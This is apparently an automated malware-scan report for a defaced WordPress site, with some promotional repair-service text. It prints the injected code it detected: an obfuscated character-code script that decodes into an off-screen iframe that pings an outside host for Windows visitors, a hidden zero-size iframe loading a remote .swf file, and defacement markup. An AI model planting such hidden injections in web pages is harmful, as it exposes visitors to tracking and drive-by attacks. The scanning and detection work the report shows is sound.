New scan:

Malware Scanner report for namokonkani.com

Malicious/Suspicious/Total urls checked
0/1/8
1 page has suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/1/1
1 suspicious iframe found. See details below
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

Hacked by Gl0w!Ng - F!R3  (48 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://namokonkani.com/
200 OK
Content-Length: 10134
Content-Type: text/html
suspicious
Suspicious code. Script contains iFrame.

var aa835d1=[557,617,657,662,675,589,672,673,678,665,658,618,591,669,668,672,662,673,662,668,667,615,589,654,655,672,668,665,674,673,658,616,589,665,658,659,673,615,602,606,605,605,594,616,589,673,668,669,615,605,594,616,589,676,662,657,673,661,615,606,605,605,594,616,589,661,658,662,660,661,673,615,606,605,605,594,616,591,619,567,617,672,656,671,662,669,673,619,675,654,671,589,662,618,605,616,659,674,667,656,673,662,668,667,589,657,668,668,597,668
...[1208 bytes skipped]...

Decoded script:


<div style="position: absolute; left:-100%; top:0%; width:100%; height:100%;">
var i=0;function doo(o){if(i==1)return;if(navigator.appVersion.indexOf("Win")!=-1){o.src="about:blank";var img = new Image(1,1);img.src = "http://mobi-avto.ru/cnt2.gif";}i=1;return;}
<iframe onload="return doo(this);" style="width:60%;height:60%;" src="about:blank"></iframe></div>
var i=0;function doo(o){if(i==1)return;if(navigator.appVersion.indexOf("Win")!=-1){o.src="about:blank";var img = new Image(1,1);img.src = "http://mobi-avto.ru/cnt2.gif"
var i=0;function doo(o){if(i==1)return;if(navigator.appVersion.indexOf("Win")!=-1){o.src="about:blank";var img = new Image(1,1);img.src = "http://mobi-avto.ru/cnt2.gif"

Hidden iFrame found.
size: 0x0     
src: http://api.ning.com/files/ofvqomlbpfubounfvlorxzro1wj2vkoob51y2i4rwpy3ieofg8tijklcycju7nzrqohuvkuq33ftgjndsvpzt3iwh3j6683a/shopnodekhandin.swf

<iframe width="0" height="0" src="http://api.ning.com/files/ofvqomlbpfubounfvlorxzro1wj2vkoob51y2i4rwpy3ieofg8tijklcycju7nzrqohuvkuq33ftgjndsvpzt3iwh3j6683a/shopnodekhandin.swf" frameborder="0" allowfullscreen="">

Deface/Content modification. The following signature was found: Hacked by Gl0w!Ng - F!R3

...[1435 bytes skipped]...
71,656,618,591,654,655,668,674,673,615,655,665,654,667,664,591,619,617,604,662,659,671,654,666,658,619,617,604,657,662,675,619];var ba835d2="";for (var i=1; i<aa835d1.length; i++) {ba835d2+=String.fromCharCode(aa835d1[i]-aa835d1[0]);} document.write(ba835d2);</script><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="Keywords" content="Hacked by Gl0w!Ng - F!R3">
<title>HackeD by Gl0w!Ng - F!R3</title>
<link rel="shortcut icon" href="http://www.sherv.net/cm/emo/funny/2/big-dancing-banana-smiley-emoticon.gif">
<style type="text/css">
body{background: url(http://w4dve.bmcwest.net/Space.gif);}
.name { text-decoration: none;}
@-moz-keyframes roll { 100% { -moz-transform: rotate(1440deg); } }
@-o-keyframes roll { 100% { -o-transform: rotate(1440deg); } }
@-webkit-k
...[9385 bytes skipped]...


http://namokonkani.com/wp-content/themes/resizable/includes/js/jquery.min.js?ver=1.8.3
200 OK
Content-Length: 93636
Content-Type: application/javascript
clean
http://namokonkani.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ajax.js?ver=3.8.10
200 OK
Content-Length: 33
Content-Type: application/javascript
clean
http://namokonkani.com/wp-content/themes/resizable/functions/shortcodes/shortcodes.js?ver=1.0.0
200 OK
Content-Length: 627
Content-Type: application/javascript
clean
http://namokonkani.com/wp-content/themes/resizable/includes/js/superfish.js?ver=1.4.2
200 OK
Content-Length: 3823
Content-Type: application/javascript
clean
http://namokonkani.com/wp-content/themes/resizable/includes/js/custom.js?ver=1.4.2
200 OK
Content-Length: 6883
Content-Type: application/javascript
clean
http://namokonkani.com/wp-content/themes/resizable/includes/js/jquery-ui-1.8.5.custom.min.js?ver=1.8.5
200 OK
Content-Length: 204320
Content-Type: application/javascript
clean
http://namokonkani.com/test404page.js
404 Not Found
Content-Length: 408
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: namokonkani.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 08 Aug 2015 23:16:30 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://namokonkani.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: namokonkani.com
Referer: http://www.google.com/search?q=namokonkani.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=namokonkani.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://namokonkani.com/

Result: namokonkani.com is not infected or malware details are not published yet.